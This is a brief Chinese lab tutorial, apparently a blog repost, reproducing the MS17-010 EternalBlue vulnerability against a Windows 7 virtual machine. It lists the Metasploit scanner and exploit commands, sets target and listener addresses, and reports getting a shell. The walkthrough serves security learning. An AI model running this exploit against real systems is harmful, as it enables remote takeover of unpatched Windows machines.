攻击机:192.168.148.132  kali linux2018.2  x64

靶机:192.168.1.129    win7   x64

首先用msfconsole的smb模块扫描,看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.1.129 (目标主机)

Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona

表示这个主机存在这个漏洞

1 search  ms17_010 搜索这个漏洞

2   use exploit/windows/smb/ms17_010_eternalblue

利用这个漏洞

3 show options

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129  目标主机

rhost => 192.168.1.129

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机

lhost => 192.168.1.132

msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 监听端口 (这个可以随意,但要大于2000,个人认为)

run  开始攻击 这个表示拿shell成功了

转载于:https://www.cnblogs.com/lanyincao/p/10358571.html

MS17-010漏洞复现相关推荐

  1. 成功爬取CVE-2019-9766漏洞复现【CSDN】【1】

    代码: import requests import bs4 from bs4 import BeautifulSoup import ress = '' headers = {'user-agent ...

  2. docker逃逸漏洞复现 cve-2019-5736

    0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现.该漏洞编号为CVE-2019-5736,漏洞影 ...

  3. php 远程代码执行漏洞复现 cve-2019-11043

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

  4. java struts2 漏洞复现合集

    目录 一.S2-001复现 二.S2-005复现 三.S2-007复现 四.S2-008复现 五.S2-009复现 六.S2-012复现 七.S2-013复现 八.S2-015复现 九.S2-016复 ...

  5. Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞

    环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 ...

  6. winrar远程代码执行漏洞复现(cve-2018-20250)

    使用metasploit验证漏洞 1.漏洞影响 WinRAR < 5.70 Beta 1 Bandizip< = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 ...

  7. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  8. Winrar目录穿越漏洞复现

    Winrar目录穿越漏洞复现 1.漏洞概述 WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在Windows环境下的图形界面.2019年 2 月 20 日Check Point团队爆出了 ...

  9. android 动画 最顶层_【Android编程实战】StrandHogg漏洞复现及原理分析_Android系统上的维京海盗...

    0x00 StrandHogg漏洞详情 StrandHogg漏洞 CVE编号:暂无 [漏洞危害] 近日,Android平台上发现了一个高危漏洞 该漏洞允许攻击者冒充任意合法应用,诱导受害者授予恶意应用 ...

  10. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

最新文章

  1. CNNIC报告:我国网民达7.72亿 人工智能取得重要进展
  2. mas714 笔记:undecidability
  3. 【学习笔记】35、定义自己的异常类
  4. About 磁珠(Bead)
  5. leetcode 778. 水位上升的泳池中游泳(并查集)
  6. mysql提供了表示日期和时间的数据类型_MySQL数据类型 - 日期和时间类型(1)
  7. Apache基金会正式宣布新一代分布式对象存储Ozone成为顶级项目
  8. JSP实现点击链接后下载文件(相当于右键另存)功能
  9. 【原】React中,map出来的元素添加事件无法使用
  10. 判断文件是否存在 VC++
  11. 【转载】阿里数据技术大图详解
  12. shell批量修改后缀_Powershell批量修改用户的UPN后缀
  13. Q版京剧脸谱来喽——花旦
  14. IMAP工作原理及特性/imap协议pop协议mail协议
  15. 口袋西游150服务器维护,口袋西游版本更新披露 幽冥界场景首曝
  16. 纳米压印光刻技术展望
  17. “好奇号”火星探测器正在利用AI自主寻找探测目标
  18. 单机版简易考试系统开发过程讲解(C#注册机、用户注册、考试系统、有偿提供全部源码)
  19. “大众点评”已去,“高德点评”再起?
  20. spring-boot创建项目出现spring-boot-starter-parent版本报红问题

热门文章

  1. 阿里妈妈流量反作弊算法实践
  2. SPSS的算法介绍与实现
  3. nokia x7 android 9.0,诺基亚X7升级Android 9.0系统
  4. 涉密服务器虚拟化软件,虚拟化软件解决方案
  5. 计算机动画人机交互,北大计算机系多媒体与人机交互.ppt
  6. 【竞赛算法学习】学术前沿趋势分析-论文数据统计
  7. LQ训练营(C++)学习笔记_常见动态规划模型
  8. 疯子的算法总结(二) STL Ⅰ 算法 ( algorithm )
  9. DIY自行车测速测距仪
  10. sublime text2快捷键